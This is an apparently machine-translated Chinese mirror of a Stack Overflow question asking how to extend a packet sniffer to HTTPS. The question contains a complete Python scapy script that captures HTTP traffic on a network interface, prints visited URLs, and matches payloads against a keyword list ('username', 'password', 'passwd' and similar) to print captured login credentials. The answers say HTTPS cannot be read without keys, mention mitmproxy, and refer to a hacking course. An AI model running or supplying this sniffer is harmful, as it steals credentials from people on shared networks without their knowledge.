如何在此處添加對嗅探 HTTPS 數據包的支持?
[英]How do I add support to sniff HTTPS packets here?
問題描述
到目前為止,我已經能夠使用它來過濾和查看 HTTP 請求和數據包。 如何包含額外的支持以類似地查看 HTTPS 數據包?
#!/usr/bin/env python
import scapy.all as scapy
from scapy.layers import http
def sniff(interface):
scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
def get_url(packet):
return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path
def get_login_info(packet):
if packet.haslayer(scapy.Raw):
load = packet[scapy.Raw].load
keywords = ['username', 'uname', 'user', 'id', 'key', 'email', 'email-id', 'login', 'password', 'pass', "passwd"]
for keyword in keywords:
if keyword in load:
return load
def process_sniffed_packet(packet):
if packet.haslayer(http.HTTPRequest):
url = get_url(packet)
print("[+] HTTP Request >>> " + url)
login_info = get_login_info(packet)
if login_info:
print("\n\nEntered login credentials >>> " + login_info + "\n\n")
sniff("eth0")
1 個解決方案
解決方案1
0 2021-02-17 23:42:50
簡短的回答:你不能。
您可能需要更多地研究 HTTPS。 由於所有內容都已加密,因此如果沒有私鑰,您將看不到任何內容。 請參閱https://security.stackexchange.com/a/83039
如果您出於調試目的這樣做,或者this他們在您已泄露的密鑰上使用 RSA,請查看mitmproxy 。 (我懷疑你正在做任何這些)
解決方案2
0 2021-12-26 04:29:41
我看到你也在關注 Zsecurity 的視頻。 你能像講座中那樣從 Bing 捕獲 url 嗎? 我只能嗅探 http 網址,但在講座中,他顯然能夠捕獲 https 和 Bing 網址。 (我確信 bing 是 https)。
當 conda 尚不支持時,如何在 Windows 上安裝最新的 Tensorflow(此處:2.2)?
[英]How do I install the most recent Tensorflow (here: 2.2) on Windows when conda does not yet support it?
聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.